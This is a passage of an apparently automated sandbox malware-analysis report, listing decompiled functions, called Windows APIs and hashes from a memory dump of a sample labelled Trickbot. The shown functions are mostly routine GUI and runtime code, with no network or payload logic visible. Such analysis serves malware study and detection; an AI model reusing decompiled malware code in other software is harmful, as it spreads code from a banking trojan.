                          				 *0x44d344 =  *0x44d344 - 1;
                          				LeaveCriticalSection(0x44d320);
                          				if( *0x44d344 == 0) {
                          					E00411880();
                          				}
                          				return 1;
                          			}

                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 00410C36
                          • EnterCriticalSection.KERNEL32(0044D320), ref: 00410C43
                          • UnhookWindowsHookEx.USER32(?), ref: 00410C86
                          • LeaveCriticalSection.KERNEL32(0044D320), ref: 00410CCB
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CriticalSection$CurrentEnterHookLeaveThreadUnhookWindows
                          • String ID:
                          • API String ID: 1197249173-0
                          • Opcode ID: d1bc0b61ea2c1d01f1e31649a6da78d39d16085671bc685b3b4963f93663c198
                          • Instruction ID: 27bbcc0db2b04a587081c694851477f4ec1e7249ca7f439611acb1bcef95169b
                          • Opcode Fuzzy Hash: d1bc0b61ea2c1d01f1e31649a6da78d39d16085671bc685b3b4963f93663c198
                          • Instruction Fuzzy Hash: 35118835A006089FC720AF65E848AA673E5F741745F40427AED0983A20E7B9A8D0CF9E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 95%
                          			E00434034(intOrPtr __ecx, void* __eflags) {
                          				void* _t21;
                          				intOrPtr* _t32;
                          				struct HICON__** _t40;
                          				intOrPtr _t43;
                          				void* _t45;
                          
                          				E00405340(E00437B97, _t45);
                          				_push(__ecx);
                          				_t43 = __ecx;
                          				 *((intOrPtr*)(_t45 - 0x10)) = __ecx;
                          				 *((intOrPtr*)(__ecx)) = 0x43b464;
                          				 *(_t45 - 4) = 1;
                          				E00420D92(__ecx + 0x78);
                          				_t39 =  *((intOrPtr*)(_t43 + 0x114));
                          				if( *((intOrPtr*)(_t43 + 0x114)) != 0) {
                          					E00435C26(_t39);
                          					E0041BE14(_t39);
                          				}
                          				E0041BE14( *((intOrPtr*)(_t43 + 0x88)));
                          				_t32 =  *((intOrPtr*)(_t43 + 0x74));
                          				if(_t32 != 0) {
                          					 *((intOrPtr*)( *_t32 + 4))(1);
                          				}
                          				_t40 = _t43 + 0x100;
                          				if( *(_t43 + 0x100) != 0) {
                          					SetCursor(LoadCursorA(0, 0x7f00));
                          					DestroyIcon( *_t40);
                          				}
                          				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
                          				E00420DC3(_t43 + 0x78);
                          				 *(_t45 - 4) =  *(_t45 - 4) | 0xffffffff;
                          				_t21 = E0041FC3D(_t43);
                          				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
                          				return _t21;
                          			}

                          APIs
                          • __EH_prolog.LIBCMT ref: 00434039
                          • LoadCursorA.USER32(00000000,00007F00), ref: 004340A3
                          • SetCursor.USER32(00000000), ref: 004340AA
                          • DestroyIcon.USER32(00000000), ref: 004340B2
                            • Part of subcall function 00435C26: __EH_prolog.LIBCMT ref: 00435C2B
                            • Part of subcall function 00435C26: DeleteDC.GDI32(?), ref: 00435C4C
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CursorH_prolog$DeleteDestroyIconLoad
                          • String ID:
                          • API String ID: 2243588198-0
                          • Opcode ID: bebf61450bcab6a44e03bb4c2e4a3240044722bae4c3a7e61e11c7e315cfdf03
                          • Instruction ID: 71aadd75907d70aeb38ba6f5edb18f31eeb5f6baf2467b7eb72f6f0b625f90e3
                          • Opcode Fuzzy Hash: bebf61450bcab6a44e03bb4c2e4a3240044722bae4c3a7e61e11c7e315cfdf03
                          • Instruction Fuzzy Hash: 7511A031600B009BD729AF61D8057EEB7B5EF88708F10451EE166972A2CBB87945CB99
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 94%
                          			E0041626C(void* __ecx, struct tagPOINT* _a8) {
                          				struct tagPOINT _v12;
                          				struct tagPOINT* _t8;
                          				struct HWND__* _t9;
                          				int _t14;
                          				long _t18;
                          				struct HWND__* _t21;
                          				struct HWND__* _t22;
                          				struct HWND__* _t24;
                          
                          				_t8 = _a8;
                          				_v12.x = _t8->x;
                          				_t18 = _t8->y;
                          				_push(_t18);
                          				_v12.y = _t18;
                          				_t9 = WindowFromPoint( *_t8);
                          				_t24 = _t9;
                          				if(_t24 != 0) {
                          					_t21 = GetParent(_t24);
                          					if(_t21 == 0 || E004225BE(_t21, 2) == 0) {
                          						ScreenToClient(_t24,  &_v12);
                          						_t22 = E00422633(_t24, _v12.x, _v12.y);
                          						if(_t22 == 0) {
                          							L6:
                          							_t9 = _t24;
                          						} else {
                          							_t14 = IsWindowEnabled(_t22);
                          							_t9 = _t22;
                          							if(_t14 != 0) {
                          								goto L6;
                          							}
                          						}
                          					} else {
                          						_t9 = _t21;
                          					}
                          				}
                          				return _t9;
                          			}

                          APIs
                          • WindowFromPoint.USER32(?,?), ref: 00416284
                          • GetParent.USER32(00000000), ref: 00416291
                          • ScreenToClient.USER32(00000000,?), ref: 004162B2
                          • IsWindowEnabled.USER32(00000000), ref: 004162CB
                            • Part of subcall function 004225BE: GetWindowLongA.USER32(00000000,000000F0), ref: 004225CF
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Window$ClientEnabledFromLongParentPointScreen
                          • String ID:
                          • API String ID: 2204725058-0
                          • Opcode ID: bada71ca1be7494428bf6668b06c46691f16795a6048c3d1de7744f9393f1ff4
                          • Instruction ID: 9956ed594e0b1c4020f4c77fb1701725dfcbd7b7a70248eb3f350d8e028f1e27
                          • Opcode Fuzzy Hash: bada71ca1be7494428bf6668b06c46691f16795a6048c3d1de7744f9393f1ff4
                          • Instruction Fuzzy Hash: 8801F736B00510BF8B02AB98DC45DEFBBB9EF85710B15406AF905D3350DBB8CD419758
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			E0042B9AB(void* __ecx, CHAR* _a4, intOrPtr _a8) {
                          				void* __ebp;
                          				void* _t23;
                          				void* _t25;
                          				CHAR* _t26;
                          				CHAR* _t29;
                          				void* _t31;
                          				CHAR* _t32;
                          
                          				_t30 = __ecx;
                          				_t32 = _a4;
                          				_t31 = __ecx;
                          				if(( *(_t32 + 4) & 0x00000001) == 0) {
                          					_t29 = LockResource(LoadResource( *(_t32 + 8), FindResourceA( *(_t32 + 8),  *(_t32 + 0xc), 5)));
                          				} else {
                          					_t29 =  *(_t32 + 0xc);
                          				}
                          				_t23 = E00432562();
                          				_t34 =  *((intOrPtr*)(_t23 + 0x1038));
                          				if( *((intOrPtr*)(_t23 + 0x1038)) != 0) {
                          					_t30 = _t31;
                          					_t29 = E0042B97B(_t31, _t34, _t29);
                          				}
                          				_push(_a8);
                          				_push(_t29);
                          				_a4 = E0042B897(_t30, _t34);
                          				_t25 =  *(_t31 + 0x44);
                          				if(_t25 != 0) {
                          					GlobalFree(_t25);
                          					 *(_t31 + 0x44) =  *(_t31 + 0x44) & 0x00000000;
                          				}
                          				_t26 = _a4;
                          				if(_t26 != 0) {
                          					_t29 = _t26;
                          					 *(_t31 + 0x44) = _t26;
                          				}
                          				 *(_t32 + 4) =  *(_t32 + 4) | 0x00000001;
                          				 *(_t32 + 0xc) = _t29;
                          				return _t26;
                          			}

                          APIs
                          • FindResourceA.KERNEL32(?,?,00000005), ref: 0042B9C9
                          • LoadResource.KERNEL32(?,00000000), ref: 0042B9D3
                          • LockResource.KERNEL32(00000000), ref: 0042B9DA
                          • GlobalFree.KERNEL32(?), ref: 0042BA0E
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Resource$FindFreeGlobalLoadLock
                          • String ID:
                          • API String ID: 3898064442-0
                          • Opcode ID: 5a0d6ba71830bb5beeed32f3f487fa126445082b49b0b5ca50987c9821e0ab17
                          • Instruction ID: 05878b3ebc334d64615eceb7928b8c26583b3a31d0dfdff706a5405c087c1196
                          • Opcode Fuzzy Hash: 5a0d6ba71830bb5beeed32f3f487fa126445082b49b0b5ca50987c9821e0ab17
                          • Instruction Fuzzy Hash: 9C1161B1700711AFDB109F65EC88A57BBE8EF08355F04842AFA5AC7661C7B9EC40CB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 95%
                          			E00419F1B(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                          				void* __ebp;
                          				struct HWND__* _t10;
                          				void* _t12;
                          				void* _t15;
                          				struct HWND__* _t17;
                          				struct HWND__* _t18;
                          				void* _t19;
                          
                          				_t15 = __ecx;
                          				_t17 = GetDlgItem(_a4, _a8);
                          				if(_t17 == 0) {
                          					L6:
                          					_t10 = GetTopWindow(_a4);
                          					while(1) {
                          						_t18 = _t10;
                          						if(_t18 == 0) {
                          							break;
                          						}
                          						_t12 = E00419F1B(_t15, _t18, _a8, _a12);
                          						if(_t12 == 0) {
                          							_t10 = GetWindow(_t18, 2);
                          							continue;
                          						}
                          						goto L11;
                          					}
                          					return 0;
                          				} else {
                          					if(GetTopWindow(_t17) == 0) {
                          						L3:
                          						_push(_t17);
                          						if(_a12 == 0) {
                          							return E0041884D(_t19);
                          						}
                          						_t12 = E00418874();
                          						if(_t12 == 0) {
                          							goto L6;
                          						}
                          					} else {
                          						_t12 = E00419F1B(_t15, _t17, _a8, _a12);
                          						if(_t12 == 0) {
                          							goto L3;
                          						}
                          					}
                          				}
                          				L11:
                          				return _t12;
                          			}

                          APIs
                          • GetDlgItem.USER32(?,?), ref: 00419F26
                          • GetTopWindow.USER32(00000000), ref: 00419F39
                          • GetTopWindow.USER32(?), ref: 00419F69
                          • GetWindow.USER32(00000000,00000002), ref: 00419F84
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Window$Item
                          • String ID:
                          • API String ID: 369458955-0
                          • Opcode ID: d49a1e12f1cae09bdfa8bf8b8b90a343932daf75df872419a94f068ab9572529
                          • Instruction ID: 6069717ea75e7622e51b553f174ac139a3fd3a854802f0833df533bb860cd4fd
                          • Opcode Fuzzy Hash: d49a1e12f1cae09bdfa8bf8b8b90a343932daf75df872419a94f068ab9572529
                          • Instruction Fuzzy Hash: ED018F32109219B7CF223F628C14ADF3A59AF40790B004126FD00D1210D739DD939A9D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 64%
                          			E00419F94(void* __edx, struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20, intOrPtr _a24) {
                          				void* __ebp;
                          				struct HWND__* _t16;
                          				void* _t20;
                          				void* _t22;
                          				struct HWND__* _t24;
                          
                          				_t22 = __edx;
                          				_t16 = GetTopWindow(_a4);
                          				while(1) {
                          					_t24 = _t16;
                          					if(_t24 == 0) {
                          						break;
                          					}
                          					if(_a24 == 0) {
                          						SendMessageA(_t24, _a8, _a12, _a16);
                          					} else {
                          						_push(_t24);
                          						_t20 = E00418874();
                          						if(_t20 != 0) {
                          							_push(_a16);
                          							_push(_a12);
                          							_push(_a8);
                          							_push( *((intOrPtr*)(_t20 + 0x1c)));
                          							_push(_t20);
                          							E0041868C(_t22);
                          						}
                          					}
                          					if(_a20 != 0 && GetTopWindow(_t24) != 0) {
                          						E00419F94(_t22, _t24, _a8, _a12, _a16, _a20, _a24);
                          					}
                          					_t16 = GetWindow(_t24, 2);
                          				}
                          				return _t16;
                          			}

                          APIs
                          • GetTopWindow.USER32(?), ref: 00419FA2
                          • SendMessageA.USER32(00000000,?,?,?), ref: 00419FD8
                          • GetTopWindow.USER32(00000000), ref: 00419FE5
                          • GetWindow.USER32(00000000,00000002), ref: 0041A003
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Window$MessageSend
                          • String ID:
                          • API String ID: 1496643700-0
                          • Opcode ID: c475cc81fc7d1e349bde436e6fe604cd2ca6a574a8379bccacff4b2d986ce10d
                          • Instruction ID: e6ff25d428d1320b785f54a7a505f37ec6242be7acdd796a9879f08a03e9147c
                          • Opcode Fuzzy Hash: c475cc81fc7d1e349bde436e6fe604cd2ca6a574a8379bccacff4b2d986ce10d
                          • Instruction Fuzzy Hash: E1010C3200511ABBCF126F959D04EDF3B6AAF49354F044016FA1491121C73ADDB2EBAA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 94%
                          			E0041BBD1(void* __ecx, void* __ebp, signed int _a4) {
                          				intOrPtr _t16;
                          				int _t17;
                          				void* _t20;
                          				struct HWND__* _t26;
                          				intOrPtr _t35;
                          				void* _t36;
                          
                          				_t37 = __ebp;
                          				_t36 = __ecx;
                          				_t16 =  *((intOrPtr*)(__ecx + 0xc));
                          				if(_t16 == 0) {
                          					if(_a4 == 0) {
                          						_t35 =  *((intOrPtr*)(__ecx + 0x14));
                          						if(GetFocus() ==  *(_t35 + 0x1c)) {
                          							_t20 = E0041884D(__ebp, GetParent( *(_t35 + 0x1c)));
                          							_t26 =  *(_t36 + 0x14);
                          							if(_t26 != 0) {
                          								_t26 =  *(_t26 + 0x1c);
                          							}
                          							E0041B83C(E0041884D(_t37, GetNextDlgTabItem( *(_t20 + 0x1c), _t26, 0)));
                          						}
                          					}
                          					_t17 = E0041B815( *(_t36 + 0x14), _a4);
                          					L9:
                          					 *((intOrPtr*)(_t36 + 0x18)) = 1;
                          					return _t17;
                          				}
                          				if( *((intOrPtr*)(__ecx + 0x10)) != 0) {
                          					return _t16;
                          				}
                          				asm("sbb ecx, ecx");
                          				_t17 = EnableMenuItem( *(_t16 + 4),  *(__ecx + 8), ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000004);
                          				goto L9;
                          			}

                          Instruction addresses: 0x0041bbd1, 0x0041bbd2, 0x0041bbd4, 0x0041bbd9, 0x0041bc07, 0x0041bc09, 0x0041bc15, 0x0041bc21, 0x0041bc26, 0x0041bc2b, 0x0041bc2d, 0x0041bc2d, 0x0041bc44, 0x0041bc44, 0x0041bc15, 0x0041bc50, 0x0041bc56, 0x0041bc56, 0x00000000, 0x0041bc56, 0x0041bbdf, 0x0041bc5e, 0x0041bc5e, 0x0041bbe7, 0x0041bbf9, 0x00000000

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Item$EnableFocusMenuNextParent
                          • String ID:
                          • API String ID: 988757621-0
                          • Opcode ID: 4057ab493c0c29e34a46ebec493171c5cab23eeaf33375c7132dab010e99f8b8
                          • Instruction ID: 85d5e01dd189e90837de880ec3fb2f4dfc0d878d9ef6231601d8d897ad172b9c
                          • Opcode Fuzzy Hash: 4057ab493c0c29e34a46ebec493171c5cab23eeaf33375c7132dab010e99f8b8
                          • Instruction Fuzzy Hash: F8115271100600EFDB29AF61D859B97B7B5EF50711F10862EF152466A0DB79EC81CB98
                          Uniqueness
                          • Uniqueness Score: -1.00%

                          C-Code - Quality: 83%
                          			E004363F0(intOrPtr* __ecx, int _a4) {
                          				struct HDC__* _t8;
                          				int _t16;
                          				void* _t18;
                          				void* _t21;
                          				intOrPtr* _t22;
                          
                          				_t16 = _a4;
                          				_t22 = __ecx;
                          				_t21 = GetStockObject(_t16);
                          				if(_t16 < 0xa || _t16 > 0xe && (_t16 <= 0xf || _t16 > 0x11)) {
                          					_t8 =  *(_t22 + 4);
                          					if(_t8 != 0) {
                          						SelectObject(_t8, _t21);
                          					}
                          					_push(SelectObject( *(_t22 + 8), _t21));
                          					return E00421789();
                          				} else {
                          					_push(SelectObject( *(_t22 + 8), _t21));
                          					_t18 = E00421789();
                          					if( *(_t22 + 0x2c) != _t21) {
                          						 *(_t22 + 0x2c) = _t21;
                          						E00436460(_t22);
                          					}
                          					return _t18;
                          				}
                          			}

                          Instruction addresses: 0x004363f1, 0x004363f7, 0x00436403, 0x00436405, 0x0043643d, 0x00436448, 0x0043644c, 0x0043644c, 0x00436454, 0x00000000, 0x00436416, 0x00436420, 0x00436429, 0x0043642b, 0x00436433, 0x00436436, 0x00436436, 0x00000000, 0x0043642d

                          APIs
                          • GetStockObject.GDI32(?), ref: 004363FA
                          • SelectObject.GDI32(?,00000000), ref: 0043641A
                          • SelectObject.GDI32(?,00000000), ref: 0043644C
                          • SelectObject.GDI32(?,00000000), ref: 00436452
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Object$Select$Stock
                          • String ID:
                          • API String ID: 3337941649-0
                          • Opcode ID: c43e7f65b255fe09af5dfe8524a847ad5792f8efa6daaa39650c61b61675290f
                          • Instruction ID: ff16c03e2ec7b37d8fe5a6e6ffefd06e949a7afc9839335ea91b85b0424e468b
                          • Opcode Fuzzy Hash: c43e7f65b255fe09af5dfe8524a847ad5792f8efa6daaa39650c61b61675290f
                          • Instruction Fuzzy Hash: 25F0A971A003027B99205B6AACC9C1F769CEAE9744751E42FF515C2621C678DC529B2D
                          Uniqueness
                          • Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00430C9B(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
                          				signed short _t21;
                          				void* _t37;
                          
                          				_t37 = __ecx;
                          				if(IsWindow( *(__ecx + 0x1c)) == 0) {
                          					 *(_t37 + 0x90) = _a4;
                          					 *(_t37 + 0x94) = _a8;
                          					 *(_t37 + 0x88) = _a12;
                          					_t21 = _a16;
                          					 *(_t37 + 0x8c) = _t21;
                          					return _t21;
                          				}
                          				SendMessageA( *(_t37 + 0x1c), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
                          				SendMessageA( *(_t37 + 0x1c), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
                          				return InvalidateRect( *(_t37 + 0x1c), 0, 1);
                          			}

                          Instruction addresses: 0x00430c9f, 0x00430cac, 0x00430cfc, 0x00430d05, 0x00430d0e, 0x00430d14, 0x00430d17, 0x00000000, 0x00430d17, 0x00430ccd, 0x00430ce7, 0x00000000

                          APIs
                          • IsWindow.USER32(?), ref: 00430CA4
                          • SendMessageA.USER32(?,00000420,00000000,?), ref: 00430CCD
                          • SendMessageA.USER32(?,0000041F,00000000,?), ref: 00430CE7
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00430CF0
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: MessageSend$InvalidateRectWindow
                          • String ID:
                          • API String ID: 3225880595-0
                          • Opcode ID: 3472c5ca7fb7b38a62a5d195244dba493fff3856a186633848bcdb42b95be8be
                          • Instruction ID: 00905af7312be1af4dad6bc9954392fbbc00918f51df730e5a65d5fe8a517435
                          • Opcode Fuzzy Hash: 3472c5ca7fb7b38a62a5d195244dba493fff3856a186633848bcdb42b95be8be
                          • Instruction Fuzzy Hash: 46011E71240718AFEB208F29DC05BAABBF4FB44750F10852AF996D6290D7B1EC51DB68
                          Uniqueness
                          • Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00410E70() {
                          				signed int _t15;
                          				intOrPtr _t17;
                          				void* _t21;
                          				long _t22;
                          				void* _t25;
                          				void* _t28;
                          				signed int _t30;
                          				void* _t31;
                          				void* _t32;
                          				void* _t35;
                          				void* _t36;
                          				void* _t37;
                          
                          				_t30 = 0;
                          				_t22 = GetCurrentThreadId();
                          				EnterCriticalSection(0x44d320);
                          				_t32 =  *0x44d39c - _t30; // 0x0
                          				if(_t32 > 0) {
                          					do {
                          						_t15 = _t30 * 4;
                          						_t28 = _t15 + _t15 * 4;
                          						if( *((intOrPtr*)(_t15 + 0x44d3a4 + _t15 * 4)) == _t22) {
                          							_t17 =  *((intOrPtr*)(_t28 + 0x44d3ac)) - 1;
                          							 *((intOrPtr*)(_t28 + 0x44d3ac)) = _t17;
                          							if(_t17 == 0) {
                          								UnhookWindowsHookEx( *(_t28 + 0x44d3a8));
                          								 *0x44d39c =  *0x44d39c - 1;
                          								_t35 = _t30 -  *0x44d39c; // 0x0
                          								if(_t35 < 0) {
                          									_t25 = _t28 + 0x44d3a0;
                          									do {
                          										_t30 = _t30 + 1;
                          										_t21 = memcpy(_t25, _t25 + 0x14, 5 << 2);
                          										_t31 = _t31 + 0xc;
                          										_t25 = _t21;
                          										_t36 = _t30 -  *0x44d39c; // 0x0
                          									} while (_t36 < 0);
                          								}
                          							}
                          						}
                          						_t30 = _t30 + 1;
                          						_t37 = _t30 -  *0x44d39c; // 0x0
                          					} while (_t37 < 0);
                          				}
                          				LeaveCriticalSection(0x44d320);
                          				return 1;
                          			}

                          Instruction addresses: 0x00410e74, 0x00410e7c, 0x00410e83, 0x00410e89, 0x00410e8f, 0x00410e91, 0x00410e91, 0x00410e9f, 0x00410ea2, 0x00410eaa, 0x00410eab, 0x00410eb1, 0x00410eba, 0x00410ec0, 0x00410ec6, 0x00410ecc, 0x00410ece, 0x00410ed4, 0x00410ede, 0x00410edf, 0x00410edf, 0x00410ee1, 0x00410ee3, 0x00410ee3, 0x00410ed4, 0x00410ecc, 0x00410eb1, 0x00410eeb, 0x00410eec, 0x00410eec, 0x00410e91, 0x00410ef9, 0x00410f08

                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 00410E76
                          • EnterCriticalSection.KERNEL32(0044D320), ref: 00410E83
                          • UnhookWindowsHookEx.USER32(?), ref: 00410EBA
                          • LeaveCriticalSection.KERNEL32(0044D320), ref: 00410EF9
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CriticalSection$CurrentEnterHookLeaveThreadUnhookWindows
                          • String ID:
                          • API String ID: 1197249173-0
                          • Opcode ID: 09f640ac9d721502e12a1ab7d4228548e4b6e44c66c57203f14034ed05055ba9
                          • Instruction ID: 05701a805504fdb9522cbdc0e1ec849b74c08f6d37fdd3284411a8a46cdee228
                          • Opcode Fuzzy Hash: 09f640ac9d721502e12a1ab7d4228548e4b6e44c66c57203f14034ed05055ba9
                          • Instruction Fuzzy Hash: B5017575B007089FC720EF56E8846AB77E5E741711F40047AED1A83610D7B56C95CB59
                          Uniqueness
                          • Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004312E3(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                          				char _v16;
                          				int _t12;
                          				signed int _t16;
                          				int _t18;
                          				intOrPtr _t19;
                          				void* _t24;
                          				intOrPtr* _t27;
                          
                          				_t19 = _a4;
                          				_t27 = __ecx;
                          				E00429BAB(__ecx, _t19, _a8);
                          				_t12 = E0041B66F(__ecx);
                          				if((_t12 & 0x00000001) != 0) {
                          					_t12 = IsZoomed(GetParent( *(__ecx + 0x1c)));
                          					if(_t12 == 0) {
                          						 *((intOrPtr*)( *_t27 + 0xa0))(0x407, 0,  &_v16, _t24);
                          						_t16 = GetSystemMetrics(5);
                          						_t18 = GetSystemMetrics(2);
                          						 *((intOrPtr*)(_t19 + 8)) =  *((intOrPtr*)(_t19 + 8)) - (_t16 << 1) - _v16 - _t18;
                          						return _t18;
                          					}
                          				}
                          				return _t12;
                          			}

                          Instruction addresses: 0x004312ea, 0x004312ee, 0x004312f4, 0x004312fb, 0x00431303, 0x0043130f, 0x00431317, 0x00431329, 0x00431337, 0x00431345, 0x0043134a, 0x00000000, 0x0043134a, 0x00431317, 0x00431350

                          APIs
                            • Part of subcall function 0041B66F: GetWindowLongA.USER32(?,000000F0), ref: 0041B67B
                          • GetParent.USER32(?), ref: 00431308
                          • IsZoomed.USER32(00000000), ref: 0043130F
                          • GetSystemMetrics.USER32(00000005), ref: 00431337
                          • GetSystemMetrics.USER32(00000002), ref: 00431345
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: MetricsSystem$LongParentWindowZoomed
                          • String ID:
                          • API String ID: 3909876373-0
                          • Opcode ID: cdd9b4a6679746e42091af103d6e83093ab396ed2c7c6f27681289a0ab75cc92
                          • Instruction ID: 5ffa13b25bbda1396c8b4ac149ef4e9d87dd7c3793bdd7ec6dc063a98998610b
                          • Opcode Fuzzy Hash: cdd9b4a6679746e42091af103d6e83093ab396ed2c7c6f27681289a0ab75cc92
